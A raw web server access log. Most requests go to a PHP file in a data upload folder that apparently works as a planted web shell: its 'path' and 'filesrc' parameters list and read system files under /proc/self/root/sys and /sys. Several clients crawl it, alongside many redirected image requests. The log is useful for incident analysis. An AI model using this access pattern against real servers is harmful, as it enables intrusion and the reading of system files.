20.171.207.131 - - [30/Oct/2025:04:34:32 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty2/subsystem/tty33/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:34:33 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty27/subsystem/tty37/power HTTP/1.1" 200 9884
192.162.210.232 - - [30/Oct/2025:04:34:33 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
46.211.215.16 - - [30/Oct/2025:04:34:34 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
94.153.42.250 - - [30/Oct/2025:04:34:34 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
88.155.84.189 - - [30/Oct/2025:04:34:34 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
46.150.64.17 - - [30/Oct/2025:04:34:34 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
20.171.207.131 - - [30/Oct/2025:04:34:34 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty0/subsystem/tty31/power HTTP/1.1" 200 9843
46.96.72.143 - - [30/Oct/2025:04:34:35 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
185.244.159.164 - - [30/Oct/2025:04:34:35 +0900] "HEAD /data/20251029_451555721550.jpg HTTP/1.1" 302 -
86.40.122.8 - - [30/Oct/2025:04:34:35 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
178.137.76.226 - - [30/Oct/2025:04:34:35 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
192.162.210.232 - - [30/Oct/2025:04:34:35 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:35 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty15/subsystem/tty55/power HTTP/1.1" 200 9884
178.137.76.226 - - [30/Oct/2025:04:34:36 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
46.211.215.16 - - [30/Oct/2025:04:34:36 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
88.155.84.189 - - [30/Oct/2025:04:34:36 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
94.153.42.250 - - [30/Oct/2025:04:34:36 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
100.29.160.53 - - [30/Oct/2025:04:34:36 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input2/subsystem/mice/subsystem/input2/subsystem/input2/input2::compose/device/subsystem/input0 HTTP/1.1" 200 14372
46.150.64.17 - - [30/Oct/2025:04:34:36 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:36 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty63/subsystem/tty48/power HTTP/1.1" 200 9884
46.96.72.143 - - [30/Oct/2025:04:34:36 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
94.153.42.250 - - [30/Oct/2025:04:34:37 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
185.244.159.164 - - [30/Oct/2025:04:34:37 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:38 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty63/subsystem/tty26/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:39 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty5/subsystem/tty60/power HTTP/1.1" 200 9843
100.28.57.133 - - [30/Oct/2025:04:34:39 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input0/subsystem/input0/subsystem/mice/subsystem/input2/subsystem/input1/device/driver HTTP/1.1" 200 7541
64.226.82.217 - - [30/Oct/2025:04:34:40 +0900] "GET /data/20251029_3074361393217.jpeg HTTP/1.1" 302 238
64.226.82.217 - - [30/Oct/2025:04:34:40 +0900] "GET /data/20251029_5298153449319.jpeg HTTP/1.1" 302 238
64.226.82.217 - - [30/Oct/2025:04:34:40 +0900] "GET /data/20251029_8643993482918.jpeg HTTP/1.1" 302 238
64.226.82.217 - - [30/Oct/2025:04:34:40 +0900] "GET /data/20251029_3707629801720.jpeg HTTP/1.1" 302 238
64.226.82.217 - - [30/Oct/2025:04:34:40 +0900] "GET /data/20251029_1270022750821.jpeg HTTP/1.1" 302 238
20.171.207.131 - - [30/Oct/2025:04:34:40 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty15/subsystem/tty36/power HTTP/1.1" 200 9884
64.226.82.217 - - [30/Oct/2025:04:34:40 +0900] "GET /data/20251029_1411336123022.jpeg HTTP/1.1" 302 238
192.162.210.232 - - [30/Oct/2025:04:34:40 +0900] "GET /data/20251029_985879890340.jpeg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:34:41 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty23/subsystem/tty62/power HTTP/1.1" 200 9884
64.226.82.217 - - [30/Oct/2025:04:34:41 +0900] "GET /data/20251029_7800776944923.jpeg HTTP/1.1" 302 238
64.226.82.217 - - [30/Oct/2025:04:34:41 +0900] "GET /data/20251029_7627992979724.jpeg HTTP/1.1" 302 238
64.226.82.217 - - [30/Oct/2025:04:34:41 +0900] "GET /data/20251029_8626438420725.jpeg HTTP/1.1" 302 238
64.226.82.217 - - [30/Oct/2025:04:34:41 +0900] "GET /data/20251029_1648746581726.jpg HTTP/1.1" 302 237
192.162.210.232 - - [30/Oct/2025:04:34:42 +0900] "GET /data/20251029_985879890340.jpeg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:34:42 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty13/subsystem/tty38/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:43 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty2/subsystem/tty56/power HTTP/1.1" 200 9843
192.162.210.232 - - [30/Oct/2025:04:34:43 +0900] "GET /data/20251029_985879890340.jpeg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:34:44 +0900] "GET /data/20251029_703779140161.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:44 +0900] "GET /data/20251029_543805342722.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:44 +0900] "GET /data/20251029_875715642604.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:44 +0900] "GET /data/20251029_519390559476.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:44 +0900] "GET /data/20251029_439817957067.jpg HTTP/1.1" 302 236
100.28.133.214 - - [30/Oct/2025:04:34:44 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input0/subsystem/event1/subsystem/mice/subsystem/input0/subsystem/event1/device/device/driver HTTP/1.1" 200 7806
64.226.82.217 - - [30/Oct/2025:04:34:44 +0900] "GET /data/20251029_797706606289.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:44 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty6/subsystem/tty32/power HTTP/1.1" 200 9843
64.226.82.217 - - [30/Oct/2025:04:34:45 +0900] "GET /data/20251029_342079741648.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:45 +0900] "GET /data/20251029_387754147733.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:45 +0900] "GET /data/20251029_951211501895.jpg HTTP/1.1" 302 236
192.162.210.232 - - [30/Oct/2025:04:34:45 +0900] "GET /data/20251029_671530258460.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:45 +0900] "GET /data/20251029_338019749330.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:45 +0900] "GET /data/20251029_5348683970510.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:34:45 +0900] "GET /data/20251029_915250201946.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:46 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty27/subsystem/tty37/power/runtime_usage&path=//proc/self/root/sys/class/tty/tty27/subsystem/tty37/power HTTP/1.1" 200 1816
64.226.82.217 - - [30/Oct/2025:04:34:46 +0900] "GET /data/20251029_443229990963.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:46 +0900] "GET /data/20251029_170503220562.jpg HTTP/1.1" 302 236
192.162.210.232 - - [30/Oct/2025:04:34:46 +0900] "GET /data/20251029_671530258460.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:46 +0900] "GET /data/20251029_597341337804.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:46 +0900] "GET /data/20251029_582775257241.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:46 +0900] "GET /data/20251029_147474699325.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:46 +0900] "GET /data/20251029_373674675217.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:46 +0900] "GET /data/20251029_822226627268.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:46 +0900] "GET /data/20251029_871615723109.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:47 +0900] "GET /data/20251029_8520750295310.jpg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:34:47 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty0/subsystem/tty31/power/runtime_status&path=//proc/self/root/sys/class/tty/tty0/subsystem/tty31/power HTTP/1.1" 200 1821
64.226.82.217 - - [30/Oct/2025:04:34:47 +0900] "GET /data/20251029_5633002631311.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:34:47 +0900] "GET /data/20251029_5464480252012.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:34:47 +0900] "GET /data/20251029_8087796330413.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:34:47 +0900] "GET /data/20251029_1988417453514.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:34:47 +0900] "GET /data/20251029_5076139603715.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:34:47 +0900] "GET /data/20251029_4217973275116.jpg HTTP/1.1" 302 237
98.84.60.17 - - [30/Oct/2025:04:34:47 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event1/subsystem/input2/subsystem/mice/subsystem/input2/input2::compose/device/event2/subsystem HTTP/1.1" 200 14269
20.171.207.131 - - [30/Oct/2025:04:34:48 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty36/subsystem/tty60/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:49 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty5/subsystem/tty60/power/runtime_active_time&path=//proc/self/root/sys/class/tty/tty5/subsystem/tty60/power HTTP/1.1" 200 1816
20.171.207.131 - - [30/Oct/2025:04:34:50 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty36/subsystem/tty10/power HTTP/1.1" 200 9884
46.211.215.16 - - [30/Oct/2025:04:34:51 +0900] "GET /data/20251029_451555721550.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:51 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty5/subsystem/tty25/power HTTP/1.1" 200 9843
35.169.119.108 - - [30/Oct/2025:04:34:52 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/hpet/subsystem/kvm/subsystem/snapshot/subsystem/device-mapper/subsystem/snapshot HTTP/1.1" 200 6061
20.171.207.131 - - [30/Oct/2025:04:34:52 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty63/subsystem/tty27/power HTTP/1.1" 200 9884
64.226.82.217 - - [30/Oct/2025:04:34:53 +0900] "GET /data/20251029_830308363582.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:53 +0900] "GET /data/20251029_244810155911.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:53 +0900] "GET /data/20251029_535028840503.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:53 +0900] "GET /data/20251029_151223757815.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:53 +0900] "GET /data/20251029_404744674914.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:34:53 +0900] "GET /data/20251029_118364859236.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:34:54 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty0/subsystem/tty36/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:34:55 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty11/subsystem/tty35/power HTTP/1.1" 200 9884
64.226.82.217 - - [30/Oct/2025:04:34:55 +0900] "GET /data/20251029_880639593727.jpg HTTP/1.1" 302 236
54.147.238.89 - - [30/Oct/2025:04:34:55 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/virtual/misc/nvram/subsystem/nvram/subsystem/snapshot/subsystem/hpet/subsystem/snapshot/power HTTP/1.1" 200 12251
20.171.207.131 - - [30/Oct/2025:04:34:56 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty63/subsystem/tty47/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:57 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty2/subsystem/tty56/power/control&path=//proc/self/root/sys/class/tty/tty2/subsystem/tty56/power HTTP/1.1" 200 1807
20.171.207.131 - - [30/Oct/2025:04:34:58 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty31/subsystem/tty12/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:34:59 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty62/subsystem/tty55/power HTTP/1.1" 200 9884
52.200.251.20 - - [30/Oct/2025:04:35:00 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/virtual/misc/mcelog/subsystem/snapshot/subsystem/autofs/subsystem/snapshot/subsystem/snapshot HTTP/1.1" 200 6383
20.171.207.131 - - [30/Oct/2025:04:35:01 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty8/subsystem/tty61/power HTTP/1.1" 200 9843
64.226.82.217 - - [30/Oct/2025:04:35:01 +0900] "GET /data/20251029_476484072390.jpeg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:35:02 +0900] "GET /data/20251029_607694962994.jpg HTTP/1.1" 302 236
20.171.207.131 - - [30/Oct/2025:04:35:02 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty47/subsystem/tty37/power HTTP/1.1" 200 9884
64.226.82.217 - - [30/Oct/2025:04:35:02 +0900] "GET /data/20251029_722859790035.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:35:02 +0900] "GET /data/20251029_237966360891.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:35:02 +0900] "GET /data/20251029_170272684702.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:35:02 +0900] "GET /data/20251029_492959908813.jpg HTTP/1.1" 302 236
192.162.210.232 - - [30/Oct/2025:04:35:02 +0900] "GET /data/20251029_703861402670.jpeg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:35:03 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty0/subsystem/tty53/power HTTP/1.1" 200 9843
64.226.82.217 - - [30/Oct/2025:04:35:03 +0900] "GET /data/20251029_678554849468.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_632327428466.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_471954360747.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_1036837932116.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_4467040895012.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_4751541346711.jpg HTTP/1.1" 302 237
52.203.65.83 - - [30/Oct/2025:04:35:04 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/virtual/misc/mcelog/subsystem/snapshot/subsystem/snapshot/subsystem/vga_arbiter/subsystem/device-mapper HTTP/1.1" 200 6557
64.226.82.217 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_3620181724410.jpg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:35:04 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty32/subsystem/tty26/power HTTP/1.1" 200 9884
192.162.210.232 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_703861402670.jpeg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_4131707787915.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_8612311678414.jpg HTTP/1.1" 302 237
64.226.82.217 - - [30/Oct/2025:04:35:04 +0900] "GET /data/20251029_688038343009.jpg HTTP/1.1" 302 236
64.226.82.217 - - [30/Oct/2025:04:35:05 +0900] "GET /data/20251029_7001267333913.jpg HTTP/1.1" 302 237
20.171.207.131 - - [30/Oct/2025:04:35:05 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty6/subsystem/tty26/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:35:06 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty33/subsystem/tty57/power HTTP/1.1" 200 9884
98.82.214.73 - - [30/Oct/2025:04:35:08 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input1/subsystem/event0/subsystem/mice/subsystem/event0/subsystem/input0/device/input HTTP/1.1" 200 3517
20.171.207.131 - - [30/Oct/2025:04:35:08 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty61/subsystem/tty10/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:09 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty5/subsystem/tty41/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:35:10 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty8/subsystem/tty44/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:35:11 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty7/subsystem/tty62/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:35:12 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty58/subsystem/tty31/power HTTP/1.1" 200 9884
23.22.105.143 - - [30/Oct/2025:04:35:12 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input0/subsystem/event2/subsystem/mice/subsystem/event1/subsystem/input1/device/input/input1 HTTP/1.1" 200 14347
20.171.207.131 - - [30/Oct/2025:04:35:13 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty57/subsystem/tty33/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:14 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty36/subsystem/tty62/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:16 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty61/subsystem/tty35/power HTTP/1.1" 200 9884
52.202.233.37 - - [30/Oct/2025:04:35:17 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event0/subsystem/mice/subsystem/input1/subsystem/input2/input2::compose/device/event2/subsystem/input1 HTTP/1.1" 200 14811
20.171.207.131 - - [30/Oct/2025:04:35:17 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty38/subsystem/tty60/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:18 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty33/subsystem/tty58/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:19 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty13/subsystem/tty46/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:20 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty48/subsystem/tty63/power HTTP/1.1" 200 9884
44.217.177.142 - - [30/Oct/2025:04:35:21 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input1/subsystem/input1/subsystem/mice/subsystem/input0/device/input/input0/device/input HTTP/1.1" 200 3642
20.171.207.131 - - [30/Oct/2025:04:35:21 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty8/subsystem/tty44/power/runtime_status&path=//proc/self/root/sys/class/tty/tty8/subsystem/tty44/power HTTP/1.1" 200 1821
20.171.207.131 - - [30/Oct/2025:04:35:22 +0900] "GET /data/submain/1758633636.php?filesrc=//proc/self/root/sys/class/tty/tty7/subsystem/tty62/power/runtime_status&path=//proc/self/root/sys/class/tty/tty7/subsystem/tty62/power HTTP/1.1" 200 1821
20.171.207.131 - - [30/Oct/2025:04:35:24 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty57/subsystem/tty13/power HTTP/1.1" 200 9884
44.195.50.71 - - [30/Oct/2025:04:35:24 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/event0/subsystem/mice/subsystem/event1/subsystem/event0/subsystem/input0/device/input HTTP/1.1" 200 3513
20.171.207.131 - - [30/Oct/2025:04:35:25 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty11/subsystem/tty32/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:26 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty8/subsystem/tty34/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:35:27 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty34/subsystem/tty46/power HTTP/1.1" 200 9884
18.235.81.246 - - [30/Oct/2025:04:35:27 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/virtual/misc/snapshot/subsystem/autofs/subsystem/snapshot/subsystem/device-mapper/subsystem/kvm HTTP/1.1" 200 6437
20.171.207.131 - - [30/Oct/2025:04:35:28 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty10/subsystem/tty61/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:29 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/system/cpu/cpu1/driver/cpu3/cpuidle/state5 HTTP/1.1" 200 7769
20.171.207.131 - - [30/Oct/2025:04:35:30 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty33/subsystem/tty15/power HTTP/1.1" 200 9884
44.215.210.112 - - [30/Oct/2025:04:35:31 +0900] "GET /data/submain/1758633636.php?path=//sys/class/misc/nvram/subsystem/nvram/subsystem/autofs/subsystem/snapshot/subsystem/vga_arbiter/power HTTP/1.1" 200 11922
20.171.207.131 - - [30/Oct/2025:04:35:32 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty53/subsystem/tty60/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:33 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty36/subsystem/tty22/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:34 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty16/subsystem/tty38/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:35 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty48/subsystem/tty38/power HTTP/1.1" 200 9884
44.220.2.97 - - [30/Oct/2025:04:35:36 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/input3/subsystem/mice/subsystem/input0/subsystem/input3/subsystem/input1/device/driver HTTP/1.1" 200 7537
20.171.207.131 - - [30/Oct/2025:04:35:36 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty7/subsystem/tty26/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:35:37 +0900] "GET /data/submain/1758633636.php?path=//sys/devices/system/cpu/cpu3/driver/cpu1/cache/index1 HTTP/1.1" 200 10423
20.171.207.131 - - [30/Oct/2025:04:35:39 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty63/subsystem/tty10/power HTTP/1.1" 200 9884
54.147.182.90 - - [30/Oct/2025:04:35:40 +0900] "GET /data/submain/1758633636.php?path=//sys/class/input/mice/subsystem/event1/subsystem/input1/subsystem/input2/input2::compose/device/subsystem/input1/device HTTP/1.1" 200 9728
20.171.207.131 - - [30/Oct/2025:04:35:40 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty7/subsystem/tty38/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:35:41 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty1/subsystem/tty28/power HTTP/1.1" 200 9843
20.171.207.131 - - [30/Oct/2025:04:35:42 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty15/subsystem/tty61/power HTTP/1.1" 200 9884
20.171.207.131 - - [30/Oct/2025:04:35:43 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty6/subsystem/tty30/power HTTP/1.1" 200 9843
52.21.62.139 - - [30/Oct/2025:04:35:44 +0900] "GET /data/submain/1758633636.php?path=//sys/dev/char/10:61/subsystem/snapshot/subsystem/snapshot/subsystem/autofs/subsystem/vga_arbiter/power HTTP/1.1" 200 11963
20.171.207.131 - - [30/Oct/2025:04:35:45 +0900] "GET /data/submain/1758633636.php?path=//proc/self/root/sys/class/tty/tty11/subsystem/tty30/power HTTP/1.1" 200 9884
